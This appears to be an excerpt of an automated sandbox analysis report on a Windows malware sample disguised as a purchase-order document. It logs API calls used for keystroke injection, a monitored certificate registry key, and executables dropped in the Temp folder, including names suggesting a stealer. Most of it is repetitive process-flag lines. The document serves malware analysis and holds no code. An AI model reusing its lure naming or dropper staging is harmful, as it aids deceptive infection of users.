Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_004375B0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_004772DE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_004375B0

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
